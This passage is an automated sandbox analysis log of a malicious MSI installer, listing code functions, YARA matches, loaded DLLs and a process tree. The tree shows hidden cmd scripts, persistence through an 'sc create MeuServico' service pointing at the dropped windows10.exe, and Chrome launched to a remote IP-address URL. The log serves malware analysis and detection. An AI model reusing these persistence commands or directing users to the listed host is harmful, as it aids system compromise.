            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BE46C414_2_00BE46C4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BE5E6414_2_00BE5E64
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00C03B8814_2_00C03B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BFEB1C14_2_00BFEB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BE86F014_2_00BE86F0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00BE714B14_2_00BE714B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00C8629F14_2_00C8629F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00C86C9714_2_00C86C97
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00C86EAC14_2_00C86EAC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00CD87ED14_2_00CD87ED
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_00CC1D5A14_2_00CC1D5A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B4B19D14_2_01B4B19D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B47D7014_2_01B47D70
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B480D614_2_01B480D6
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B3C30314_2_01B3C303
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B40B6214_2_01B40B62
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B49F5A14_2_01B49F5A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B3F22314_2_01B3F223
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01B49E2914_2_01B49E29
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01DF05D714_2_01DF05D7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01DEF00014_2_01DEF000
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01DEF72014_2_01DEF720
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01C8773A14_2_01C8773A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01C844C414_2_01C844C4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 14_2_01C85C1F14_2_01C85C1F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00ADB5B826_2_00ADB5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D8671026_2_00D86710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CBA2CD26_2_00CBA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D9741026_2_00D97410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CF46B026_2_00CF46B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CCD9E026_2_00CCD9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB2AA026_2_00CB2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB5A3426_2_00CB5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00CB9F4D26_2_00CB9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00D79F6C26_2_00D79F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00B0FD4026_2_00B0FD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC46C426_2_00DC46C4
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC5E6426_2_00DC5E64
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC86F026_2_00DC86F0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DC714B26_2_00DC714B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DE3B8826_2_00DE3B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00DDEB1C26_2_00DDEB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00EB87ED26_2_00EB87ED
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00EA1D5A26_2_00EA1D5A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E66EAC26_2_00E66EAC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E66C9726_2_00E66C97
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_00E6629F26_2_00E6629F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5E5B726_2_01F5E5B7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_020ED66926_2_020ED669
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0201268626_2_02012686
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5CD4B26_2_01F5CD4B
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5D93826_2_01F5D938
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F608E926_2_01F608E9
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5BCBE26_2_01F5BCBE
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5CFB026_2_01F5CFB0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F613B326_2_01F613B3
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5A77A26_2_01F5A77A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F60B6A26_2_01F60B6A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0200C8D726_2_0200C8D7
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_01F5DF1F26_2_01F5DF1F
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 26_2_0204293326_2_02042933
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Pictures\fotosdaviagem\windows10.exe 585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
            Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSID686.tmp 42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: String function: 004085D0 appears 39 times
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: String function: 00408246 appears 69 times
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: String function: 00408213 appears 100 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00BFC298 appears 37 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00DDC298 appears 37 times
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: String function: 00D98213 appears 100 times
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: String function: 00D98246 appears 69 times
            Source: C:\Windows\Installer\MSIDD92.tmpCode function: String function: 00D985D0 appears 39 times
            Source: StarBurn.dll.2.drStatic PE information: Number of sections : 13 > 10
            Source: hBqTrQLya4.msiBinary or memory string: OriginalFilenameviewer.exeF vs hBqTrQLya4.msi
            Source: hBqTrQLya4.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs hBqTrQLya4.msi
            Source: classification engineClassification label: mal84.evad.winMSI@44/35@2/4
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003E61D0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,12_2_003E61D0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003E6EE0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,12_2_003E6EE0
            Source: C:\Windows\Installer\MSIDD62.tmpCode function: 12_2_003E1D70 LoadResource,LockResource,SizeofResource,12_2_003E1D70
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLD965.tmpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user~1\AppData\Local\Temp\MSI9cfef.LOGJump to behavior
            Source: Yara matchFile source: 00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.2499650796.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Windows\Installer\MSIDD62.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hBqTrQLya4.msiReversingLabs: Detection: 31%
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIDD62.tmp "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIDD92.tmp "C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MeuServico
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIDD62.tmp "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIDD92.tmp "C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartupJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-tokenJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= autoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MeuServicoJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.phpJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2Jump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
